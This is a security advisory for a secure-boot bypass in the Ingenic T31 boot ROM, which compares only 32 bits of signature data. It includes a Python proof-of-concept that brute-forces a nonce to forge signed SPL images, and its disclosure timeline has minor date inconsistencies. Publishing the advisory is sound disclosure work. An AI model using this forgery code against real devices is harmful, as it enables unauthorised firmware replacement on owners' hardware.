OPENSENSOR ENGINEERING
Security Disclosures
CVE-2026-50720CWE-347 · Improper Verification of Cryptographic SignaturePhysical Attack Vector

Ingenic T31 Boot ROM — Improper Secure Boot Verification

32-bit partial comparison allows forged SPL images without the OEM signing key

Discovered: March 2026 · Vendor notified: March 17, 2026 · CVE assigned: June 2026

Vendor
Ingenic Semiconductor
Affected Products
T31X
Attack Vector
Physical (boot media write)
Patchable?
No — mask ROM

Vulnerability Description

The Ingenic T31 SoC boot ROM implements secure boot verification for SPL (Secondary Program Loader) images using RSA-2048 and SHA-256. Due to an implementation flaw in the flash-boot verification path, the boot ROM compares only a single 32-bit word of the RSA-derived output against a single 32-bit word of the SHA-256 payload digest, rather than comparing the full cryptographic data. This reduces the effective security of the verification to 32 bits and allows an attacker with physical write access to the device's boot media to forge modified SPL images that pass secure boot verification without possession of the OEM signing key.

Each forgery attempt succeeds with approximately 2-in-3 probability. Re-salting the nonce provides independent trials. This has been validated via reverse engineering, software emulation against vendor-signed images, and end-to-end hardware acceptance of a forged firmware image on a Wyze Video Doorbell v2 (T31X).

Full technical details will be published following coordinated disclosure.

Impact

  • Complete bypass of first-stage secure boot demonstrated on T31X
  • Execution of arbitrary unsigned SPL and second-stage bootloader code
  • Full firmware replacement without OEM signing key
  • Vulnerability is in mask ROM and cannot be remediated by firmware update
  • Physical access to boot media (SPI NOR flash) required

Proof of Concept

The following demonstrates the 4-byte SHA-256 collision search used to forge an SPL image. The target word is derived from the vendor signature and public key. A nonce is iterated until the first 32 bits of the payload hash match the target.

#!/usr/bin/env python3
"""T31 4-byte hash collision forgery — proof of concept."""
import hashlib, struct, sys
from pathlib import Path

def forge_collision(payload: bytes, target_word: int,
                    nonce_offset: int) -> int:
    """Find a 4-byte SHA-256 collision by brute-forcing a nonce."""
    target_bytes = struct.pack('>I', target_word)
    payload = bytearray(payload)

    for nonce in range(2**32):
        struct.pack_into('<I', payload, nonce_offset, nonce)
        h = hashlib.sha256(bytes(payload)).digest()
        if h[0:4] == target_bytes:
            return nonce
    return None

# Usage:
#   target = 0x3024cc99  # derived from vendor signature
#   nonce = forge_collision(payload, target, 0x3290)

Expected work factor: 2^31 average iterations. On a 32-worker CPU search, ~15 MH/s throughput yields collision in 3-4 minutes.

Disclosure Timeline

  1. March 17, 2026Ingenic Semiconductor notified via multiple channels
  2. March 17, 2026Downstream vendor notified; active coordination ongoing
  3. March 2026Vulnerability confirmed by hardware demonstration on T31X device
  4. March 25, 2026CVE submitted to MITRE — 7 days after vendor notification; early submission due to unpatchable mask ROM vulnerability
  5. June 2026CVE-2026-50720 assigned by MITRE
  6. May 30, 2026Full technical details published — Maine BSides

Credit

Matt Davis (OpenSensor Engineering LLC) and Alfonso Gamboa — equal co-discovery.